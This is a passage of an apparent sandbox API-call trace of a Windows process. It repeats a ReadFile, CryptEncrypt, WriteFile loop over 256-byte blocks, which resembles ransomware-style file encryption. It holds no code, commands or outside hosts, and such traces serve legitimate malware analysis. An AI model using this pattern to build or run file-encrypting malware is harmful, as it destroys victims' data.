lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.258] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.258] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.258] GetLastError () returned 0x0 [0153.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.258] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.258] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.258] GetLastError () returned 0x0 [0153.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.258] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.258] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.258] GetLastError () returned 0x0 [0153.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.258] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.258] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.258] GetLastError () returned 0x0 [0153.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.258] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.259] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.259] GetLastError () returned 0x0 [0153.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.259] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.259] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.259] GetLastError () returned 0x0 [0153.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.259] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.259] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.259] GetLastError () returned 0x0 [0153.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.259] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.259] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.259] GetLastError () returned 0x0 [0153.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.259] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.259] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.259] GetLastError () returned 0x0 [0153.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.259] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.259] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.259] GetLastError () returned 0x0 [0153.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.259] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.259] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.259] GetLastError () returned 0x0 [0153.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.260] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.260] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.260] GetLastError () returned 0x0 [0153.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.260] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.260] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.260] GetLastError () returned 0x0 [0153.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.260] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.260] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.260] GetLastError () returned 0x0 [0153.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.260] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.260] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.260] GetLastError () returned 0x0 [0153.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.260] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.260] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.260] GetLastError () returned 0x0 [0153.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.260] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.260] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.260] GetLastError () returned 0x0 [0153.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.260] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.261] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.261] GetLastError () returned 0x0 [0153.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.261] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.261] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.261] GetLastError () returned 0x0 [0153.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.261] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.261] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.261] GetLastError () returned 0x0 [0153.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.261] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.261] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.261] GetLastError () returned 0x0 [0153.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.261] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.261] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.261] GetLastError () returned 0x0 [0153.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.261] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.261] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.261] GetLastError () returned 0x0 [0153.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.261] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.262] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.262] GetLastError () returned 0x0 [0153.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.262] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.262] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.262] GetLastError () returned 0x0 [0153.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.262] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.262] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.262] GetLastError () returned 0x0 [0153.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.262] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.262] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.262] GetLastError () returned 0x0 [0153.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.262] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.262] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.262] GetLastError () returned 0x0 [0153.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.262] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.262] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.262] GetLastError () returned 0x0 [0153.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.263] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.263] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.263] GetLastError () returned 0x0 [0153.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.263] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.263] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.263] GetLastError () returned 0x0 [0153.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.263] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.263] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.263] GetLastError () returned 0x0 [0153.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.263] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, 